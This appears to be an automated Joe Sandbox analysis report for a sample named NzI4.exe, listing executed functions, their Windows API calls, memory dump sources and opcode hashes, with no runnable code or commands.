Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CriticalSectionSleep$EnterLeave
String ID:
API String ID: 890587828-0
Opcode ID: 2e5f2a7be58a541593dcebee813d02368c63509f341683be91463bad87c06b5d
Instruction ID: 6217db6c281fe0f9be4ca6715f6c5f710dc9020e776075e698295bee0e3e5f86
Opcode Fuzzy Hash: 2e5f2a7be58a541593dcebee813d02368c63509f341683be91463bad87c06b5d
Instruction Fuzzy Hash: EF214F33628A818BD7588B34949027D7371FB45B68F240235EE6E836D8CF3CE865CB00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NzI4.exePID: 7736, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1431
Total number of Limit Nodes:	25

Executed Functions

Function 00007FF720C121AC Relevance: 13.8, APIs: 9, Instructions: 273
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF720C11D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11DD1
Part of subcall function 00007FF720C11D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11E51
Part of subcall function 00007FF720C11D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF720C11EA5
Part of subcall function 00007FF720C11D90: _get_daylight.LIBCMT ref: 00007FF720C11EFD

CreateFileW.KERNELBASE ref: 00007FF720C122B2
CreateFileW.KERNEL32 ref: 00007FF720C12302
GetLastError.KERNEL32 ref: 00007FF720C12332
GetFileType.KERNELBASE ref: 00007FF720C12347
GetLastError.KERNEL32 ref: 00007FF720C12351
CloseHandle.KERNEL32 ref: 00007FF720C12384
CloseHandle.KERNEL32 ref: 00007FF720C124DF
CreateFileW.KERNEL32 ref: 00007FF720C12514
GetLastError.KERNEL32 ref: 00007FF720C12523

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: ce5669ae4ee54aa3f53f5135a37de033940a3ee15ed4778064c01fcdce3bf99e
Instruction ID: 38eccc61a263f8ea0d4586943ee9608d6ec6ef1c228dc5e56360d1bd322562ab
Opcode Fuzzy Hash: ce5669ae4ee54aa3f53f5135a37de033940a3ee15ed4778064c01fcdce3bf99e
Instruction Fuzzy Hash: 6EC1E576B14A4186EB10DF69D8905ACB771FB49B94B901235DE1E577D8CF38E091CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0E57C Relevance: 10.8, APIs: 7, Instructions: 291
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720C0E9B2

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: caa62503522cfca78ef5c44c7728e681291f1759d481d7bea4eab11902c58ffb
Instruction ID: 6c5da0712156320ad0d93d052f8e097b7f83b81f82902ee4ca86d39c6bcac53e
Opcode Fuzzy Hash: caa62503522cfca78ef5c44c7728e681291f1759d481d7bea4eab11902c58ffb
Instruction Fuzzy Hash: 6CC1C0E2A6C68645E6617B299C402FDA662FF80B80FC44231EA4E077D5CE7CF495CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BCB7D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF720BCB7F4
LoadLibraryExA.KERNELBASE ref: 00007FF720BCB84B
SetLastError.KERNEL32 ref: 00007FF720BCB85C

Strings

cannot load module '%s': %s, xrefs: 00007FF720BCB88E
%s.dll, xrefs: 00007FF720BCB82F

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast$LibraryLoad
String ID: %s.dll$cannot load module '%s': %s
API String ID: 1136134869-4289185444
Opcode ID: c844f6a29efa947424cb09f57144a9e1a9ee2c23f4a27d5807583d39c1045496
Instruction ID: 7e5df35fdecc6ffc6c23a99a677191ba9d2e60c5f466a39f9dbafb727b646f96
Opcode Fuzzy Hash: c844f6a29efa947424cb09f57144a9e1a9ee2c23f4a27d5807583d39c1045496
Instruction Fuzzy Hash: 9F11F621A197968AE624AB26AC0096DA774EB44BD0F884131DF5E03F85CE3DF481CF30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8DCB0 Relevance: 7.7, APIs: 6, Instructions: 155
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF720B8DCFE
VirtualAlloc.KERNELBASE ref: 00007FF720B8DD16
SetLastError.KERNEL32 ref: 00007FF720B8DD21
GetLastError.KERNEL32 ref: 00007FF720B8DD94
VirtualAlloc.KERNELBASE ref: 00007FF720B8DDAD
SetLastError.KERNEL32 ref: 00007FF720B8DDB8

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast$AllocVirtual
String ID:
API String ID: 1225938287-0
Opcode ID: 2f2143bb498941bec75cced9dcacd0c17fdc8fa6ec24fcee7208aa3e6033dbcc
Instruction ID: 6b23d90737dcb13c247202bef8a5021574e4f1a4e0b2f4b5e86c0c14594d9511
Opcode Fuzzy Hash: 2f2143bb498941bec75cced9dcacd0c17fdc8fa6ec24fcee7208aa3e6033dbcc
Instruction Fuzzy Hash: BA518D62705B4182EE349B25EC4436DB3A1FB54B94F984A3ACA6F4B7A0DF3CE445C724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8BE10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,?,?,00007FF720B7AA0C,?,?,?,?,?,?,?,?,?,00007FF720B80C10), ref: 00007FF720B8BE31
GetProcAddressForCaller.KERNELBASE(?,?,?,00007FF720B7AA0C,?,?,?,?,?,?,?,?,?,00007FF720B80C10), ref: 00007FF720B8BE4A

Strings

advapi32.dll, xrefs: 00007FF720B8BE28
SystemFunction036, xrefs: 00007FF720B8BE40

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: AddressCallerLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 4215043672-1354007664
Opcode ID: cebfdd190c46d91446e68554ad3b86c01d433f54c184786dfb086cdbc5a6554b
Instruction ID: 4c4f3adb5934f28bab38b5a70c6e6e5572552dbee56de2e57d0d000b951564bc
Opcode Fuzzy Hash: cebfdd190c46d91446e68554ad3b86c01d433f54c184786dfb086cdbc5a6554b
Instruction Fuzzy Hash: E2113062F15B0685FF24AB35DC957B962A1EF64B45F840834C90E067A4EE7CF4918770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C09F90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF720C09FC9
LCMapStringEx.KERNELBASE ref: 00007FF720C0A01D
LCMapStringW.KERNEL32 ref: 00007FF720C0A051

Strings

LCMapStringEx, xrefs: 00007FF720C09FAC, 00007FF720C09FBD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: String$try_get_function
String ID: LCMapStringEx
API String ID: 1203122356-3893581201
Opcode ID: 2b6ef0dcb588f211d0c714de11c13471664f00ff4b6a7aa5471f9e10c7e91108
Instruction ID: 81ae6d3aa0392ac7a8e319e1d1a01457fec74e2a9ca4cfab65cc69d02d9b1394
Opcode Fuzzy Hash: 2b6ef0dcb588f211d0c714de11c13471664f00ff4b6a7aa5471f9e10c7e91108
Instruction Fuzzy Hash: A6113071608B8186D760DB19B8402EAB765FB88B94F544136EE8D43B59CF3CE480CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BAD070 Relevance: 6.1, APIs: 4, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF720BAD0AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF720BBC1D5,?,?,?,?,00007FF720BC0639), ref: 00007FF720BAD0E3
VirtualProtect.KERNEL32 ref: 00007FF720BAD131
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF720BBC1D5,?,?,?,?,00007FF720BC0639), ref: 00007FF720BAD176

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fa44b1b3b309ba523a39dd5dae24c0e1ac7f96c1a153774b8ae88088be8c7adc
Instruction ID: 218bc50439c91fad09e58f7ad62ca26184e81cd20dbaea4a745c8516d483f00a
Opcode Fuzzy Hash: fa44b1b3b309ba523a39dd5dae24c0e1ac7f96c1a153774b8ae88088be8c7adc
Instruction Fuzzy Hash: 2921756270958681EB65DF25ED447ADA3A0FB44B88F884032DB0F47754DF3DE4A5CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8E210 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF720B8E240
VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF720B8E25E
VirtualFree.KERNELBASE ref: 00007FF720B8E293
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF720B8E2AB

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLastVirtual$FreeQuery
String ID:
API String ID: 2187276999-0
Opcode ID: a284c8eb4bfbe97b37498066048d2db83e0e4d00ca9cadab829bf9187241a676
Instruction ID: f68c185e7c64dbb26e986e17730bd9adbe698a1d5496762f9d868b1d2e4a6e24
Opcode Fuzzy Hash: a284c8eb4bfbe97b37498066048d2db83e0e4d00ca9cadab829bf9187241a676
Instruction Fuzzy Hash: 1C111835A19A81C6DA71AF15AC4026DF364FB95BC0F480139DA9E12B68CF3CF4858F20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8D950 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF720B8D965
VirtualQuery.KERNEL32 ref: 00007FF720B8D980
VirtualFree.KERNELBASE ref: 00007FF720B8D9B5
SetLastError.KERNEL32 ref: 00007FF720B8D9CD

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLastVirtual$FreeQuery
String ID:
API String ID: 2187276999-0
Opcode ID: 839317e8228041fa2e1f2648b85889a3486948da1cdd9c0f93754aaadfb7b849
Instruction ID: eb119c2f79ae30bb478c43f699be795eb9e81a86ce20d988b82251307d40ba73
Opcode Fuzzy Hash: 839317e8228041fa2e1f2648b85889a3486948da1cdd9c0f93754aaadfb7b849
Instruction Fuzzy Hash: 41111971B18A8142EB719B15BC4022DE7A1FF45BD4F48413ADA5E46B68DF3CF5848F20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B8E0E0 Relevance: 3.8, APIs: 3, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00007FF720B7AA2E,?,?,?,?,?,?,?,?,?,00007FF720B80C10), ref: 00007FF720B8E0EA
VirtualAlloc.KERNELBASE(?,?,?,00007FF720B7AA2E,?,?,?,?,?,?,?,?,?,00007FF720B80C10), ref: 00007FF720B8E103
SetLastError.KERNEL32(?,?,?,00007FF720B7AA2E,?,?,?,?,?,?,?,?,?,00007FF720B80C10), ref: 00007FF720B8E10E

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast$AllocVirtual
String ID:
API String ID: 1225938287-0
Opcode ID: 285b33b9818949d3c29423ddccaaa5e87681a57d664be0d455f9b4024412526f
Instruction ID: 2b88dc4dadb61af5fd0f4e73abed5075ddb36b1fb384e9a658a86c70145bf987
Opcode Fuzzy Hash: 285b33b9818949d3c29423ddccaaa5e87681a57d664be0d455f9b4024412526f
Instruction Fuzzy Hash: B721A172B14A8086D7249B21ED8439DA2A1EB45BB8F584334DA7A07FD8CF3CD5858750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C168A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32 ref: 00007FF720C168E2

Strings

, xrefs: 00007FF720C16925

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: d26b197fc85d6378a6b55222ed312ac47425772993a6907c9e646548b17fbfe6
Instruction ID: 68d74b27b430eabd4874ecc38545e32f218d6b5b616b841f3a27996044a3cd4a
Opcode Fuzzy Hash: d26b197fc85d6378a6b55222ed312ac47425772993a6907c9e646548b17fbfe6
Instruction Fuzzy Hash: 9D51A2B291C6C186E724AF28D4442EDFBA0FB44748F945135EA8D47B45CB3CE585CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BACEF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FF720BACF22

Strings

, xrefs: 00007FF720BACF2C

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 01fbac281c50a49a96e9d0cb43a1ec749b8e80516e3f3a373b503d2e74f4f941
Instruction ID: 7c1a9966bef6018ae690128d486ab5ad69da46db999e6c8cc79151e57beb230b
Opcode Fuzzy Hash: 01fbac281c50a49a96e9d0cb43a1ec749b8e80516e3f3a373b503d2e74f4f941
Instruction Fuzzy Hash: 55E09261A1A68686EB24EB65DC487EC73A0EB14B4CF5C0032DA1E0B351CF39D0978B24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C16D78 Relevance: 3.2, APIs: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF720C16790: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF720C16AB4,?,?,?,?,00000000,COMSPEC,?,00007FF720C16D4E), ref: 00007FF720C167BA

IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF720C16B67,?,?,?,?,00000000,COMSPEC,?,00007FF720C16D4E), ref: 00007FF720C16DE3
GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF720C16B67,?,?,?,?,00000000,COMSPEC,?,00007FF720C16D4E), ref: 00007FF720C16E2F

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: b30f117d48d73a8056a61fa276d23b3d8ed677ba98b71f99d919e611270c9a61
Instruction ID: cd4599a9c7ad993aad4acdcad0fc396f63cc01ed9f9a08aa0313dd821716ee4a
Opcode Fuzzy Hash: b30f117d48d73a8056a61fa276d23b3d8ed677ba98b71f99d919e611270c9a61
Instruction Fuzzy Hash: 9E81B0E6A0C68286E765BF2DE8442B9F7A1EF44740F885136D68E47790DE3DF5818B30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BFB600 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB63C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF720BFB739

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 12f44f115ac616be0532b19613da48ae23ec1e31c1aa57495a1ed08c34be612c
Instruction ID: e602edb6ebb8aeac3d85c16f0da86657a9d8f59996fa9c35824b5eae8cbbd96c
Opcode Fuzzy Hash: 12f44f115ac616be0532b19613da48ae23ec1e31c1aa57495a1ed08c34be612c
Instruction Fuzzy Hash: 4751A621B0964189F678BE259C08A7EE665FF84BA4F884234ED6E577C5CE3CF4418E30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720C0D978 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF720C0D8AB,?,?,00000000,00007FF720C0D953,?,?,?,?,?,?,00007FF720BFB44A), ref: 00007FF720C0D9DE
GetLastError.KERNEL32(?,?,?,00007FF720C0D8AB,?,?,00000000,00007FF720C0D953,?,?,?,?,?,?,00007FF720BFB44A), ref: 00007FF720C0D9E8

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 3a14b92c9bbadddff11f5306f7ca1229d44cf6feb5347e96e6aaedb0fa6da2c0
Instruction ID: ead14b7c02dcfc2ea9632f5ee5cde3cb101f64e324c6997e62e747b3536eed88
Opcode Fuzzy Hash: 3a14b92c9bbadddff11f5306f7ca1229d44cf6feb5347e96e6aaedb0fa6da2c0
Instruction Fuzzy Hash: 16118C91B1824201EA60776DAC903FDD293FF847A0F845235DA1E467C2CE6DB4C1CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720BCB8A0 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF720BCB8DB
FreeLibrary.KERNELBASE ref: 00007FF720BCB909

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b5ffc7456c5bc9b3dafa6904a3a06c31e735427cff01c1fb9606859edb2597bb
Instruction ID: 3010db5ef7081ca883f7b9d348ae16726f7dff30e477b7b146a7bdb84df6790a
Opcode Fuzzy Hash: b5ffc7456c5bc9b3dafa6904a3a06c31e735427cff01c1fb9606859edb2597bb
Instruction Fuzzy Hash: 15015232A18A8585EA50DF25FC4053DB3B8FF94BA4F955122DB6A03B98CF3CE451CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF720B7E310 Relevance: 2.6, APIs: 2, Instructions: 129COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF720B7E341
SetLastError.KERNEL32 ref: 00007FF720B7E4DB

Memory Dump Source

Source File: 00000012.00000002.2174478493.00007FF720B71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF720B70000, based on PE: true

Associated: 00000012.00000002.2174461884.00007FF720B70000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174538965.00007FF720C21000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174571615.00007FF720C42000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.2174631469.00007FF720C45000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff720b70000_NzI4.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2bbd389214606fdf99eea415a151996156015ab3f66345b9d67328ffe386fc39
